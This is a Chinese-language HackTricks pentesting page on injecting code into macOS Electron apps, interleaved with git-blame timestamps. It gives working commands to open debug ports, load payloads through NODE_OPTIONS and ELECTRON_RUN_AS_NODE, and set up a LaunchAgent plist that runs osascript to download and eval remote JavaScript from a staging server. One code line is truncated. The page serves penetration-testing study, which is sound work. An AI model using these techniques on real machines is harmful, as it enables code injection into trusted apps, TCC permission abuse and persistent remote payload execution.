2023-08-03 19:12:22 +00:00
|
|
|
|
# macOS Electron应用程序注入
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 向Electron应用程序添加代码
|
2023-06-14 00:31:26 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
Electron应用程序的JS代码未经签名,因此攻击者可以将应用程序移动到可写位置,注入恶意JS代码并启动该应用程序以滥用TCC权限。
|
2023-06-14 00:31:26 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
然而,修改应用程序需要**`kTCCServiceSystemPolicyAppBundles`**权限,默认情况下不再允许此操作。
|
2023-06-14 00:31:26 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 检查Electron应用程序
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
根据[**这篇文章**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f),如果你使用**`--inspect`**、**`--inspect-brk`**和**`--remote-debugging-port`**等标志来执行Electron应用程序,将会打开一个**调试端口**,你可以连接到它(例如从Chrome中的`chrome://inspect`),然后你就可以在其中**注入代码**或者启动新的进程。\
|
|
|
|
|
例如:
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
|
|
|
|
{% code overflow="wrap" %}
|
|
|
|
|
```bash
|
|
|
|
|
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
|
|
|
|
|
# Connect to it using chrome://inspect and execute a calculator with:
|
|
|
|
|
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
|
|
|
|
```
|
|
|
|
|
{% endcode %}
|
|
|
|
|
|
|
|
|
|
{% hint style="danger" %}
|
2023-08-03 19:12:22 +00:00
|
|
|
|
请注意,现在已经**加固**的 Electron 应用程序在启动时将忽略节点参数(如 --inspect),除非设置了环境变量 **`ELECTRON_RUN_AS_NODE`**。
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
但是,您仍然可以使用 electron 参数 `--remote-debugging-port=9229`,但之前的有效载荷将无法执行其他进程。
|
2023-06-13 00:15:20 +00:00
|
|
|
|
{% endhint %}
|
|
|
|
|
|
2023-06-13 10:12:02 +00:00
|
|
|
|
## `NODE_OPTIONS`
|
|
|
|
|
|
|
|
|
|
{% hint style="warning" %}
|
2023-08-03 19:12:22 +00:00
|
|
|
|
如果 Electron 应用程序已经被适当加固并且允许使用此变量,则此环境变量才能起作用。如果已经加固,您还需要使用环境变量 **`ELECTRON_RUN_AS_NODE`**。
|
2023-06-13 10:12:02 +00:00
|
|
|
|
{% endhint %}
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
通过这种组合,您可以将有效载荷存储在不同的文件中并执行该文件:
|
2023-06-13 10:12:02 +00:00
|
|
|
|
|
|
|
|
|
{% code overflow="wrap" %}
|
|
|
|
|
```bash
|
|
|
|
|
# Content of /tmp/payload.js
|
|
|
|
|
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Ca$
|
|
|
|
|
|
|
|
|
|
# Execute
|
|
|
|
|
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
|
|
|
|
```
|
2023-06-13 00:15:20 +00:00
|
|
|
|
## `ELECTRON_RUN_AS_NODE` <a href="#electron_run_as_node" id="electron_run_as_node"></a>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
根据[**文档**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node)的说明,如果设置了这个环境变量,它将以普通的Node.js进程启动。
|
2023-06-13 00:15:20 +00:00
|
|
|
|
```bash
|
|
|
|
|
# Run this
|
|
|
|
|
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
|
|
|
|
|
# Then from the nodeJS console execute:
|
|
|
|
|
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
|
|
|
|
|
```
|
|
|
|
|
{% endcode %}
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
正如[**在这里提出的**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/),您可以滥用这个环境变量在 plist 中保持持久性:
|
2023-06-13 00:15:20 +00:00
|
|
|
|
```xml
|
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
|
|
|
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
|
|
|
|
<plist version="1.0">
|
|
|
|
|
<dict>
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<key>EnvironmentVariables</key>
|
|
|
|
|
<dict>
|
|
|
|
|
<key>ELECTRON_RUN_AS_NODE</key>
|
|
|
|
|
<string>true</string>
|
|
|
|
|
</dict>
|
|
|
|
|
<key>Label</key>
|
|
|
|
|
<string>com.xpnsec.hideme</string>
|
|
|
|
|
<key>ProgramArguments</key>
|
|
|
|
|
<array>
|
|
|
|
|
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
|
|
|
|
|
<string>-e</string>
|
|
|
|
|
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
|
|
|
|
|
</array>
|
|
|
|
|
<key>RunAtLoad</key>
|
|
|
|
|
<true/>
|
2023-06-13 00:15:20 +00:00
|
|
|
|
</dict>
|
|
|
|
|
</plist>
|
|
|
|
|
```
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
|
2023-06-13 00:15:20 +00:00
|
|
|
|
|
|
|
|
|
</details>
|